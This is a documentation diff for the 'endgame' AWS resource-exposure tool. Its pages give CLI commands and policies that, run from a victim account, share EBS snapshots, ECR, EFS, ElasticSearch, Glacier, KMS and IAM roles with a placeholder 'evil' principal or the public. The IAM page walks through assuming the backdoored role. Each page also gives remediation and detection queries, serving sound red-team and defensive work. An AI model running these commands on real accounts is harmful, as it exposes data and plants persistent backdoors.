- [aws ec2 describe-image-attribute](https://docs.aws.amazon.com/cli/latest/reference/ec2/describe-image-attribute.html)

93
docs/risks/ebs.md Normal file
View File

@ -0,0 +1,93 @@
# EBS Snapshot Exposure
* [Steps to Reproduce](#steps-to-reproduce)
* [Exploitation](#exploitation)
* [Remediation](#remediation)
* [Basic Detection](#basic-detection)
* [References](#references)
## Steps to Reproduce
* To expose the resource using `endgame`, run the following from the victim account:
```bash
export EVIL_PRINCIPAL=*
export SNAPSHOT_ID=snap-1234567890abcdef0
endgame expose --service ebs --name $SNAPSHOT_ID
```
* To expose the resource using the AWS CLI, run the following from the victim account:
```bash
export SNAPSHOT_ID=snap-1234567890abcdef0
aws ec2 modify-snapshot-attribute \
--snapshot-id $SNAPSHOT_ID \
--attribute createVolumePermission \
--operation-type add \
--group-names all
```
* To verify that the snapshot has been shared with the public, run the following from the victim account:
```bash
export SNAPSHOT_ID=snap-1234567890abcdef0
aws ec2 describe-snapshot-attribute \
--snapshot-id $SNAPSHOT_ID \
--attribute createVolumePermission
```
* Observe that the contents match the example shown below.
## Example
The response of `aws ec2 describe-snapshot-attribute` will match the below, indicating that the EBS snapshot is public.
```json
{
"SnapshotId": "snap-066877671789bd71b",
"CreateVolumePermissions": [
{
"Group": "all"
}
]
}
```
## Exploitation
After an EBS Snapshot is made public, an attacker can then:
* [copy the public snapshot](https://docs.aws.amazon.com/cli/latest/reference/ec2/copy-snapshot.html) to their own account
* Use the snapshot to create an EBS volume
* Attach the EBS volume to their own EC2 instance and browse the contents of the disk, potentially revealing sensitive or otherwise non-public information.
## Remediation
> ‼️ **Note**: At the time of this writing, AWS Access Analyzer does **NOT** support auditing of this resource type to prevent resource exposure. **We kindly suggest to the AWS Team that they support all resources that can be attacked using this tool**. 😊
* **Encrypt all Snapshots with Customer-Managed Keys**: Follow the encryption-related recommendations in the [Prevention Guide](https://endgame.readthedocs.io/en/latest/prevention/#use-aws-kms-customer-managed-keys)
* **Trusted Accounts Only**: Ensure that EBS Snapshots are only shared with trusted accounts, and that the trusted accounts truly need access to the EBS Snapshot.
* **Ensure access is necessary**: For any trusted accounts that do have access, ensure that the access is absolutely necessary.
* **Restrict access to IAM permissions that could lead to exposure of your EBS Snapshots**: Tightly control access to the following IAM actions:
- [ec2:ModifySnapshotAttribute](https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_ModifySnapshotAttribute.html): _Grants permission to add or remove permission settings for a snapshot_
- [ec2:DescribeSnapshotAttribute](https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeSnapshotAttribute.html): _Grants permission to describe an attribute of a snapshot. This includes information on which accounts the snapshot has been shared with._
- [ec2:DescribeSnapshots](https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeSnapshots.html): _Grants permission to describe one or more EBS snapshots_
Also, consider using [Cloudsplaining](https://github.com/salesforce/cloudsplaining/#cloudsplaining) to identify violations of least privilege in IAM policies. This can help limit the IAM principals that have access to the actions that could perform Resource Exposure activities. See the example report [here](https://opensource.salesforce.com/cloudsplaining/)
## Basic Detection
The following CloudWatch Log Insights query will include exposure actions taken by endgame:
```
fields eventTime, eventSource, eventName, userIdentity.arn, userAgent
| filter eventSource='ec2.amazonaws.com' and (eventName='ModifySnapshotAttribute' and requestParameters.attributeType='CREATE_VOLUME_PERMISSION')
```
This query assumes that your CloudTrail logs are being sent to CloudWatch and that you have selected the correct log group.
## References
* [Sharing an Unencrypted Snapshot using the Console](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ebs-modifying-snapshot-permissions.html#share-unencrypted-snapshot)
* [Share a snapshot using the command line](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ebs-modifying-snapshot-permissions.html)
* [aws ec2 copy-snapshot](https://docs.aws.amazon.com/cli/latest/reference/ec2/copy-snapshot.html)

108
docs/risks/ecr.md Normal file
View File

@ -0,0 +1,108 @@
# Elastic Container Registries (ECR)
* [Steps to Reproduce](#steps-to-reproduce)
* [Exploitation](#exploitation)
* [Remediation](#remediation)
* [Basic Detection](#basic-detection)
* [References](#references)
## Steps to Reproduce
* To expose the resource using `endgame`, run the following from the victim account:
```bash
export EVIL_PRINCIPAL=arn:aws:iam::999988887777:user/evil
expose --service ecr --name test-resource-exposure
```
* Alternatively, to expose the resource using the AWS CLI:
Create a file named `ecr-policy.json` with the following contents:
```json
{
"Version" : "2008-10-17",
"Statement" : [
{
"Sid" : "allow public pull",
"Effect" : "Allow",
"Principal" : "*",
"Action" : [
"ecr:*"
]
}
]
}
```
Then run the following from the victim account:
```bash
aws ecr set-repository-policy --repository-name test-resource-exposure --policy-text file://ecr-policy.json
```
* To view the contents of the exposed resource policy, run the following:
```bash
aws ecr get-repository-policy \
--repository-name test-resource-exposure
```
* Observe that the contents match the example shown below.
## Example
The policy shown below shows a policy that grants access to Principal `*`. If the output contains `*` in Principal, that means the ECR repository is public. If the Principal contains just an account ID, that means it is shared with another account.
```json
{
"registryId": "111122223333",
"repositoryName": "test-resource-exposure",
"policyText": "{\n \"Version\" : \"2008-10-17\",\n \"Statement\" : [ {\n \"Sid\" : \"allow public pull\",\n \"Effect\" : \"Allow\",\n \"Principal\" : \"*\",\n \"Action\" : \"ecr:*\"\n } ]\n}"
}
```
## Exploitation
```
TODO
```
## Remediation
> ‼️ **Note**: At the time of this writing, AWS Access Analyzer does **NOT** support auditing of this resource type to prevent resource exposure. **We kindly suggest to the AWS Team that they support all resources that can be attacked using this tool**. 😊
* **Leverage Strong Resource-based Policies**: Follow the resource-based policy recommendations in the [Prevention Guide](https://endgame.readthedocs.io/en/latest/prevention/#leverage-strong-resource-based-policies)
* **Trusted Accounts Only**: Ensure that ECR Repositories are only shared with trusted accounts, and that the trusted accounts truly need access to the ECR Repository.
* **Ensure access is necessary**: For any trusted accounts that do have access, ensure that the access is absolutely necessary.
* **Restrict access to IAM permissions that could lead to exposure of your ECR Repositories**: Tightly control access to the following IAM actions:
- [ecr:SetRepositoryPolicy](https://docs.aws.amazon.com/AmazonECR/latest/APIReference/API_SetRepositoryPolicy.html): _Grants permission to apply a repository policy on a specified repository to control access permissions_
- [ecr:DeleteRepositoryPolicy](https://docs.aws.amazon.com/AmazonECR/latest/APIReference/API_DeleteRepositoryPolicy.html): _Grants permission to delete the repository policy from a specified repository_
- [ecr:GetRepositoryPolicy](https://docs.aws.amazon.com/AmazonECR/latest/APIReference/API_GetRepositoryPolicy.html): _Grants permission to retrieve the repository policy for a specified repository_
- [ecr:DescribeRepositories](https://docs.aws.amazon.com/AmazonECR/latest/APIReference/API_DescribeRepositories.html): _Grants permission to describe image repositories in a registry_
- [ecr:PutRegistryPolicy](https://docs.aws.amazon.com/AmazonECR/latest/APIReference/API_PutRegistryPolicy.html): _Grants permission to update the registry policy_
- [ecr:DeleteRegistryPolicy](https://docs.aws.amazon.com/AmazonECR/latest/APIReference/API_DeleteRegistryPolicy.html): _Grants permission to delete the registry policy_
Also, consider using [Cloudsplaining](https://github.com/salesforce/cloudsplaining/#cloudsplaining) to identify violations of least privilege in IAM policies. This can help limit the IAM principals that have access to the actions that could perform Resource Exposure activities. See the example report [here](https://opensource.salesforce.com/cloudsplaining/)
## Basic Detection
The following CloudWatch Log Insights query will include exposure actions taken by endgame:
```
fields eventTime, eventSource, eventName, userIdentity.arn, userAgent
| filter eventSource='ecr.amazonaws.com' and (eventName='SetRepositoryPolicy' or eventName='DeleteRepositoryPolicy'
or eventName='PutRegistryPolicy' or eventName='DeleteRegistryPolicy')
```
The following query detects policy modifications which include the default IOC string:
```
fields eventTime, eventSource, eventName, userIdentity.arn, userAgent
| filter eventSource='ecr.amazonaws.com' and (eventName='SetRepositoryPolicy' and responseElements.policyText like 'Endgame')
```
This query assumes that your CloudTrail logs are being sent to CloudWatch and that you have selected the correct log group.
## References
* [set-repository-policy](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ecr/set-repository-policy.html)

122
docs/risks/efs.md Normal file
View File

@ -0,0 +1,122 @@
# Elastic File Systems (EFS)
* [Steps to Reproduce](#steps-to-reproduce)
* [Exploitation](#exploitation)
* [Remediation](#remediation)
* [Basic Detection](#basic-detection)
* [References](#references)
## Steps to Reproduce
> Note: The Terraform demo infrastructure will output the EFS File System ID. If you are using the Terraform demo infrastructure, you must leverage the file system ID in the `--name` parameter.
* To expose the resource using `endgame`, run the following from the victim account:
```bash
export EVIL_PRINCIPAL=arn:aws:iam::999988887777:user/evil
endgame expose --service efs --name fs-01234567
```
* Alternatively, to expose the resource using the AWS CLI, run the following from the victim account:
```bash
aws efs put-file-system-policy --file-system-id fs-01234567 --policy '{
"Version": "2012-10-17",
"Id": "read-only-example-policy02",
"Statement": [
{
"Sid": "AllowEverybody",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": [
"elasticfilesystem:*"
],
"Resource": "*"
}
]
}'
```
* To view the contents of the file system policy, run the following:
```bash
aws efs describe-file-system-policy \
--file-system-id fs-01234567
```
* Observe that the contents of the overly permissive resource-based policy match the example shown below.
## Example
The policy below shows the EFS policy granting `elasticfilesystem:*` access to the file system from the evil principal (`arn:aws:iam::999988887777:user/evil`).
```json
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "AllowCurrentAccount",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::111122223333:root"
},
"Action": "elasticfilesystem:*",
"Resource": "arn:aws:elasticfilesystem:us-east-1:111122223333:file-system/fs-01234567"
},
{
"Sid": "Endgame",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::999988887777:user/evil"
},
"Action": "elasticfilesystem:*",
"Resource": "arn:aws:elasticfilesystem:us-east-1:111122223333:file-system/fs-01234567"
}
]
}
```
## Exploitation
```
TODO
```
## Remediation
> ‼️ **Note**: At the time of this writing, AWS Access Analyzer does **NOT** support auditing of this resource type to prevent resource exposure. **We kindly suggest to the AWS Team that they support all resources that can be attacked using this tool**. 😊
* **Block Public Access to the EFS File System**: Follow the EFS Guidance [here](https://docs.aws.amazon.com/efs/latest/ug/access-control-block-public-access.html) to block public access to the EFS File Systems.
* **Leverage Strong Resource-based Policies**: Follow the resource-based policy recommendations in the [Prevention Guide](https://endgame.readthedocs.io/en/latest/prevention/#leverage-strong-resource-based-policies)
* **Trusted Accounts Only**: Ensure that EFS File Systems are only shared with trusted accounts, and that the trusted accounts truly need access to the File System.
* **Ensure access is necessary**: For any trusted accounts that do have access, ensure that the access is absolutely necessary.
* **Restrict access to IAM permissions that could lead to exposure of your EFS File Systems**: Tightly control access to the following IAM actions:
- [elasticfilesystem:PutFileSystemPolicy](https://docs.aws.amazon.com/efs/latest/ug/API_PutFileSystemPolicy.html): _Grants permission to apply a resource-level policy that defines the actions allowed or denied from given actors for the specified file system_
- [elasticfilesystem:DescribeFileSystems](https://docs.aws.amazon.com/efs/latest/ug/API_DescribeFileSystems.html): _Grants permission to view the description of an Amazon EFS file system specified by file system CreationToken or FileSystemId; or to view the description of all file systems owned by the caller's AWS account in the AWS region of the endpoint that is being called_
- [elasticfilesystem:DescribeFileSystemPolicy](https://docs.aws.amazon.com/efs/latest/ug/API_DescribeFileSystemPolicy.html): _Grants permission to view the resource-level policy for an Amazon EFS file system_
Also, consider using [Cloudsplaining](https://github.com/salesforce/cloudsplaining/#cloudsplaining) to identify violations of least privilege in IAM policies. This can help limit the IAM principals that have access to the actions that could perform Resource Exposure activities. See the example report [here](https://opensource.salesforce.com/cloudsplaining/)
## Basic Detection
The following CloudWatch Log Insights query will include exposure actions taken by endgame:
```
fields eventTime, eventSource, eventName, userIdentity.arn, userAgent
| filter eventSource='elasticfilesystem.amazonaws.com' and eventName='PutFileSystemPolicy'
```
The following query detects policy modifications which include the default IOC string:
```
fields eventTime, eventSource, eventName, userIdentity.arn, userAgent
| filter eventSource='elasticfilesystem.amazonaws.com' and (eventName='PutFileSystemPolicy' and requestParameters.policy like 'Endgame')
```
This query assumes that your CloudTrail logs are being sent to CloudWatch and that you have selected the correct log group.
## References
* [put-filesystem-policy](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/efs/put-file-system-policy.html)
* [Creating File System Policies](https://docs.aws.amazon.com/efs/latest/ug/create-file-system-policy.html)

84
docs/risks/es.md Normal file
View File

@ -0,0 +1,84 @@
# ElasticSearch Domains
* [Steps to Reproduce](#steps-to-reproduce)
* [Exploitation](#exploitation)
* [Remediation](#remediation)
* [Basic Detection](#basic-detection)
* [References](#references)
> Note: The **Network Configuration** settings in ElasticSearch clusters offer two options - **VPC Access** or **Public access**. If VPC access is used, modification of the resource-based policy - whether using `endgame` or the CLI exploitation method - will not result in access to the internet. `endgame` only modifies the resource-based policy for the ElasticSearch cluster, so this will only expose ElasticSearch clusters that are set to **Public access*.
## Steps to Reproduce
* To expose the resource using `endgame`, run the following from the victim account:
```bash
export EVIL_PRINCIPAL=arn:aws:iam::999988887777:user/evil
endgame expose --service elasticsearch --name test-resource-exposure
```
* To get the content of the resource-based policy for ElasticSearch domain config, run the following command from the victim account:
```bash
aws es describe-elasticsearch-domain-config --domain-name test-resource-exposure
```
## Example
The response will contain a field titled `AccessPolicies`. AccessPolicies will contain content that resembles the below. Observe that the victim resource (`arn:aws:es:us-east-1:999988887777:domain/test-resource-exposure`) allows access to `*` principals, indicating a successful compromise.
```json
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": "es:*",
"Resource": "arn:aws:es:us-east-1:999988887777:domain/test-resource-exposure/*"
}
]
}
```
## Exploitation
```
TODO
```
## Remediation
> ‼️ **Note**: At the time of this writing, AWS Access Analyzer does **NOT** support auditing of this resource type to prevent resource exposure. **We kindly suggest to the AWS Team that they support all resources that can be attacked using this tool**. 😊
The **Network Configuration** settings in ElasticSearch clusters offer two options - **VPC Access** or **Public access**. If VPC access is used, modification of the resource-based policy - whether using `endgame` or the CLI exploitation method - will not result in access to the internet. `endgame` only modifies the resource-based policy for the ElasticSearch cluster, so this will only expose ElasticSearch clusters that are set to **Public access*.
* Consider Migrating from Public Access to VPC Access, if possible. This will help you avoid a situation where an attacker could expose your ElasticSearch cluster to the internet with a single API call. For more information, see the documentation on [Migrating from Public Access to VPC Access](https://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-vpc.html#es-migrating-public-to-vpc).
However, if **Public Access** _is_ necessary, follow the steps below to remediate this risk and reduce the likelihood that a compromise in your AWS account could lead to exposure of your ElasticSearch cluster.
* **Trusted Accounts Only**: Ensure that ElasticSearch Clusters are only shared with trusted accounts, and that the trusted accounts truly need access to the ElasticSearch cluster.
* **Ensure access is necessary**: For any trusted accounts that do have access, ensure that the access is absolutely necessary.
* **Restrict access to IAM permissions that could lead to exposure of your ElasticSearch Clusters**: Tightly control access to the following IAM actions:
- [es:UpdateElasticsearchDomainConfig](https://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-configuration-api.html#es-configuration-api-actions-updateelasticsearchdomainconfig): _Grants permission to modify the configuration of an Amazon ES domain, which includes the Resource-Based Policy (RBP) content. The RBP can be modified to allow access from external IAM principals or from the internet._
- [es:DescribeElasticsearchDomainConfig](): _Grants permission to view a description of the configuration options and status of an Amazon ES domain. This includes the Resource Based Policy content, which contains information on which IAM principals are authorized to acccess the cluster._
- [es:ListDomainNames](https://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-configuration-api.html#es-configuration-api-actions-listdomainnames): _Grants permission to display the names of all Amazon ES domains that the current user owns._
Also, consider using [Cloudsplaining](https://github.com/salesforce/cloudsplaining/#cloudsplaining) to identify violations of least privilege in IAM policies. This can help limit the IAM principals that have access to the actions that could perform Resource Exposure activities. See the example report [here](https://opensource.salesforce.com/cloudsplaining/)
## Basic Detection
The following CloudWatch Log Insights query will include exposure actions taken by endgame:
```
fields eventTime, eventSource, eventName, userIdentity.arn, userAgent
| filter eventSource='es.amazonaws.com' and eventName='UpdateElasticsearchDomainConfig'
```
This query assumes that your CloudTrail logs are being sent to CloudWatch and that you have selected the correct log group.
## References
* [ElasticSearch Resource-based Policies](https://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-ac.html#es-ac-types-resource)
* [Migrating from Public Access to VPC Access](https://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-vpc.html#es-migrating-public-to-vpc)

82
docs/risks/glacier.md Normal file
View File

@ -0,0 +1,82 @@
# Glacier Vault
* [Steps to Reproduce](#steps-to-reproduce)
* [Exploitation](#exploitation)
* [Remediation](#remediation)
* [Basic Detection](#basic-detection)
* [References](#references)
## Steps to Reproduce
* To expose the resource using `endgame`, run the following from the victim account:
```bash
export EVIL_PRINCIPAL=arn:aws:iam::999988887777:user/evil
endgame expose --service glacier --name test-resource-exposure
```
* To view the contents of the Glacier Vault Access Policy, run the following:
```bash
export VICTIM_ACCOUNT_ID=111122223333
aws glacier get-vault-access-policy \
--account-id $VICTIM_ACCOUNT_ID \
--vault-name test-resource-exposure
```
* Observe that the output of the overly permissive Glacier Vault Access Policies resembles the example shown below.
## Example
Observe that the policy below allows the evil principal (`arn:aws:iam::999988887777:user/evil`) the `glacier:*` permissions to the Glacier Vault named `test-resource-exposure`.
```json
{
"policy": {
"Policy": "{\"Version\":\"2012-10-17\",\"Statement\":[{\"Sid\":\"AllowCurrentAccount\",\"Effect\":\"Allow\",\"Principal\":{\"AWS\":\"arn:aws:iam::111122223333:root\"},\"Action\":\"glacier:*\",\"Resource\":\"arn:aws:glacier:us-east-1:111122223333:vaults/test-resource-exposure\"},{\"Sid\":\"Endgame\",\"Effect\":\"Allow\",\"Principal\":{\"AWS\":\"arn:aws:iam::999988887777:user/evil\"},\"Action\":\"glacier:*\",\"Resource\":\"arn:aws:glacier:us-east-1:111122223333:vaults/test-resource-exposure\"}]}"
}
}
```
## Exploitation
```
TODO
```
## Remediation
> ‼️ **Note**: At the time of this writing, AWS Access Analyzer does **NOT** support auditing of this resource type to prevent resource exposure. **We kindly suggest to the AWS Team that they support all resources that can be attacked using this tool**. 😊
* **Trusted Accounts Only**: Ensure that Glacier Vaults are only shared with trusted accounts, and that the trusted accounts truly need access to the Vaults.
* **Ensure access is necessary**: For any trusted accounts that do have access, ensure that the access is absolutely necessary.
* **Leverage Strong Resource-based Policies**: Follow the resource-based policy recommendations in the [Prevention Guide](https://endgame.readthedocs.io/en/latest/prevention/#leverage-strong-resource-based-policies)
* **Restrict access to IAM permissions that could lead to exposure of your Vaults**: Tightly control access to the following IAM actions:
- [glacier:GetVaultAccessPolicy](https://docs.aws.amazon.com/amazonglacier/latest/dev/api-GetVaultAccessPolicy.html): _Retrieves the access-policy subresource set on the vault_
- [glacier:ListVaults](https://docs.aws.amazon.com/amazonglacier/latest/dev/api-vaults-get.html): _Lists all vaults_
- [glacier:SetVaultAccessPolicy](https://docs.aws.amazon.com/amazonglacier/latest/dev/api-SetVaultAccessPolicy.html): _Configures an access policy for a vault and will overwrite an existing policy._
Also, consider using [Cloudsplaining](https://github.com/salesforce/cloudsplaining/#cloudsplaining) to identify violations of least privilege in IAM policies. This can help limit the IAM principals that have access to the actions that could perform Resource Exposure activities. See the example report [here](https://opensource.salesforce.com/cloudsplaining/)
## Basic Detection
The following CloudWatch Log Insights query will include exposure actions taken by endgame:
```
fields eventTime, eventSource, eventName, userIdentity.arn, userAgent
| filter eventSource='glacier.amazonaws.com' and eventName='SetVaultAccessPolicy'
```
The following query detects policy modifications which include the default IOC string:
```
fields eventTime, eventSource, eventName, userIdentity.arn, userAgent
| filter eventSource='glacier.amazonaws.com' and (eventName='SetVaultAccessPolicy' and requestParameters.policy.policy like 'Endgame')
```
This query assumes that your CloudTrail logs are being sent to CloudWatch and that you have selected the correct log group.
## References
* [set-vault-access-policy](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/glacier/set-vault-access-policy.html)
* [get-vault-access-policy](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/glacier/get-vault-access-policy.html)

184
docs/risks/iam-roles.md Normal file
View File

@ -0,0 +1,184 @@
# IAM Roles (via AssumeRole)
* [Steps to Reproduce](#steps-to-reproduce)
* [Exploitation](#exploitation)
* [Remediation](#remediation)
* [Basic Detection](#basic-detection)
* [References](#references)
## Steps to Reproduce
* To expose the resource using `endgame`, run the following from the victim account:
```bash
export EVIL_PRINCIPAL=arn:aws:iam::999988887777:user/evil
endgame expose --service iam --name test-resource-exposure
```
* Alternatively, to expose the resource using the AWS CLI:
Create a file titled `Evil-Trust-Policy.json` with the following contents:
```json
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "Endgame",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::999988887777:user/evil"
},
"Action": "sts:AssumeRole"
}
]
}
```
Apply the evil Assume Role Policy by running the following from the victim account:
```bash
aws iam update-assume-role-policy --role-name test-resource-exposure --policy-document file://Evil-Trust-Policy.json
```
* To view the contents of the Assume Role Policy that grants access to the evil user, run the following:
```bash
aws iam get-role --role-name test-resource-exposure
```
* Observe that the output of the overly permissive AssumeRolePolicy match the example shown below.
## Example
Observe that the content of the `AssumeRolePolicyDocument` key allows `sts:AssumeRole` access from the evil principal (`arn:aws:iam::999988887777:user/evil`)
```json
{
"Role": {
"Path": "/",
"RoleName": "test-resource-exposure",
"RoleId": "",
"Arn": "arn:aws:iam::111122223333:role/test-resource-exposure",
"CreateDate": "2021-02-13T19:21:51Z",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Sid": "",
"Effect": "Allow",
"Principal": {
"Service": "ec2.amazonaws.com"
},
"Action": "sts:AssumeRole"
},
{
"Sid": "AllowCurrentAccount",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::111122223333:root"
},
"Action": "sts:AssumeRole"
},
{
"Sid": "Endgame",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::999988887777:user/evil"
},
"Action": "sts:AssumeRole"
}
]
},
"Tags": [
{
"Key": "Owner",
"Value": "yourmom"
}
],
"RoleLastUsed": {}
}
}
```
## Exploitation
* Set your AWS Access keys to the Evil Principal (`arn:aws:iam::999988887777:user/evil`) credentials
* Verify that you can run `sts:AssumeRole` to the victim account
```bash
aws sts assume-role --profile evil --role-arn arn:aws:iam::111122223333:role/test-resource-exposure --role-session-name HotDogsAreSandwiches
```
* The output will contain `AccessKeyId`, `SecretAccessKey`, and `SessionToken` below. Note the values.
```
{
"Credentials": {
"AccessKeyId": "",
"SecretAccessKey": "",
"SessionToken": "",
"Expiration": "2021-02-13T21:24:46Z"
},
"AssumedRoleUser": {
"AssumedRoleId": "roleid:HotDogsAreSandwiches",
"Arn": "arn:aws:sts::111122223333:assumed-role/test-resource-exposure/HotDogsAreSandwiches"
}
}
```
* Set those values to your AWS credentials environment variables
```bash
export AWS_ACCESS_KEY_ID=outputfromAccessKeyId
export AWS_SECRET_ACCESS_KEY=outputfromSecretAccessKey
export AWS_SESSION_TOKEN=outputfromSessionToken
```
* To validate that you are leveraging the victim's credentials, run `aws sts get-caller-identity` (this API Call is the equivalent of `whoami`)
```bash
aws sts get-caller-identity
```
* Observe that the output of the call contains the Victim Account ID under `Account`, as well as an ARN that indicates you have assumed the victim role.
```
{
"UserId": "AROAblah:HotDogsAreSandwiches",
"Account": "111122223333",
"Arn": "arn:aws:sts::111122223333:assumed-role/test-resource-exposure/HotDogsAreSandwiches"
}
```
* Congratulations! You've created a backdoor role in the victim's account 😈
## Remediation
* **Trusted Accounts Only**: Ensure that IAM roles can only be assumed by trusted accounts and the trusted principals within those accounts.
* **Ensure access is necessary**: For any trusted accounts that do have access, ensure that the access is absolutely necessary.
* **AWS Access Analyzer**: Leverage AWS Access Analyzer to report on external access to Assume IAM Roles. See [the AWS Access Analyzer documentation](https://docs.aws.amazon.com/IAM/latest/UserGuide/access-analyzer-resources.html) for more details.
* **Restrict access to IAM permissions that could lead to exposure of your IAM Roles**: Tightly control access to the following IAM actions:
- [iam:UpdateAssumeRolePolicy](https://docs.aws.amazon.com/IAM/latest/APIReference/API_UpdateAssumeRolePolicy.html): _Grants permission to update the policy that grants an IAM entity permission to assume a role_
- [iam:GetRole](https://docs.aws.amazon.com/IAM/latest/APIReference/API_GetRole.html): _Grants permission to retrieve information about the specified role, including the role's path, GUID, ARN, and the role's trust policy_
- [iam:ListRoles](https://docs.aws.amazon.com/IAM/latest/APIReference/API_ListRoles.html): _Grants permission to list the IAM roles that have the specified path prefix_
Also, consider using [Cloudsplaining](https://github.com/salesforce/cloudsplaining/#cloudsplaining) to identify violations of least privilege in IAM policies. This can help limit the IAM principals that have access to the actions that could perform Resource Exposure activities. See the example report [here](https://opensource.salesforce.com/cloudsplaining/)
## Basic Detection
The following CloudWatch Log Insights query will include exposure actions taken by endgame:
```
fields eventTime, eventSource, eventName, userIdentity.arn, userAgent
| filter eventSource='iam.amazonaws.com' and eventName='UpdateAssumeRolePolicy'
```
This query assumes that your CloudTrail logs are being sent to CloudWatch and that you have selected the correct log group.
## References
* [update-assume-role-policy](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/iam/update-assume-role-policy.html)
* [Learn more about IAM cross-account trust](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_common-scenarios_aws-accounts.html)

88
docs/risks/kms.md Normal file
View File

@ -0,0 +1,88 @@
# KMS Keys
* [Steps to Reproduce](#steps-to-reproduce)
* [Exploitation](#exploitation)
* [Remediation](#remediation)
* [Basic Detection](#basic-detection)
* [References](#references)
## Steps to Reproduce
* To expose the resource using `endgame`, run the following from the victim account:
```bash
export EVIL_PRINCIPAL=arn:aws:iam::999988887777:user/evil
endgame expose --service kms --name test-resource-exposure
```
* To view the contents of the Glacier Vault Access Policy, run the following:
```bash
export VICTIM_KEY_ARN=arn:aws:kms:us-east-2:111122223333:key/1234abcd-12ab-34cd-56ef-1234567890ab
aws kms get-key-policy --key-id $VICTIM_KEY_ARN --policy-name default
```
* Observe that the output of the overly permissive KMS Key Policy resembles the example shown below.
## Example
Observe that the policy below allows the evil principal (`arn:aws:iam::999988887777:user/evil`) the `kms:*` permissions to the KMS Key.
```json
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "Endgame",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::999988887777:user/evil"
},
"Action": "kms:*",
"Resource": "arn:aws:kms:us-east-1:111122223333:key/1234abcd-12ab-34cd-56ef-1234567890ab"
}
]
}
```
## Exploitation
```
TODO
```
## Remediation
* **Leverage Strong Resource-based Policies**: Follow the resource-based policy recommendations in the [Prevention Guide](https://endgame.readthedocs.io/en/latest/prevention/#leverage-strong-resource-based-policies)
* **Trusted Accounts Only**: Ensure that KMS Keys are only shared with trusted accounts, and that the trusted accounts truly need access to the key.
* **Ensure access is necessary**: For any trusted accounts that do have access, ensure that the access is absolutely necessary.
* **AWS Access Analyzer**: Leverage AWS Access Analyzer to report on external access to KMS Keys. See [the AWS Access Analyzer documentation](https://docs.aws.amazon.com/IAM/latest/UserGuide/access-analyzer-resources.html) for more details.
* **Restrict access to IAM permissions that could lead to exposure of your KMS Keys**: Tightly control access to the following IAM actions:
- [kms:PutKeyPolicy](https://docs.aws.amazon.com/kms/latest/APIReference/API_PutKeyPolicy.html): _Controls permission to replace the key policy for the specified customer master key_
- [kms:GetKeyPolicy](https://docs.aws.amazon.com/kms/latest/APIReference/API_GetKeyPolicy.html): _Controls permission to view the key policy for the specified customer master key_
- [kms:ListKeys](https://docs.aws.amazon.com/kms/latest/APIReference/API_ListKeys.html): _Controls permission to view the key ID and Amazon Resource Name (ARN) of all customer master keys in the account_
- [kms:ListAliases](https://docs.aws.amazon.com/kms/latest/APIReference/API_ListAliases.html): _Controls permission to view the aliases that are defined in the account. Aliases are optional friendly names that you can associate with customer master keys_
Also, consider using [Cloudsplaining](https://github.com/salesforce/cloudsplaining/#cloudsplaining) to identify violations of least privilege in IAM policies. This can help limit the IAM principals that have access to the actions that could perform Resource Exposure activities. See the example report [here](https://opensource.salesforce.com/cloudsplaining/)
## Basic Detection
The following CloudWatch Log Insights query will include exposure actions taken by endgame:
```
fields eventTime, eventSource, eventName, userIdentity.arn, userAgent
| filter eventSource='kms.amazonaws.com' and eventName='PutKeyPolicy'
```
The following query detects policy modifications which include the default IOC string:
```
fields eventTime, eventSource, eventName, userIdentity.arn, userAgent
| filter eventSource='kms.amazonaws.com' and (eventName='PutKeyPolicy' and requestParameters.policy like 'Endgame')
```
This query assumes that your CloudTrail logs are being sent to CloudWatch and that you have selected the correct log group.
## References
* [put-key-policy](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/kms/put-key-policy.html)
* [get-key-policy](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/kms/get-key-policy.html)

View File

@ -0,0 +1,118 @@
# Lambda Function Cross-Account Access
* [Steps to Reproduce](#steps-to-reproduce)
* [Exploitation](#exploitation)
* [Remediation](#remediation)
* [Basic Detection](#basic-detection)
* [References](#references)
AWS Lambda Permission Policies (aka resource-based policies) can allow functions to be invoked from AWS accounts other than the one it is running in.
Compromised Lambda functions are a known attack path for [Privilege Escalation](https://resources.infosecinstitute.com/topic/cloudgoat-walkthrough-lambda-privilege-escalation/) and other nefarious use cases. While the impact often depends on the context of the Lambdas itself, Lambda functions often modify AWS infrastructure or have data plane access. Abusing these capabilities could compromise the confidentiality and integrity of the resources in the account.
